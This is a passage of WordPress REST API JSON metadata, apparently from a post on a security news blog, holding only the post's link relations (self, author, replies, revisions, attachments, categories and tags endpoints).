Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57136"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57136\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}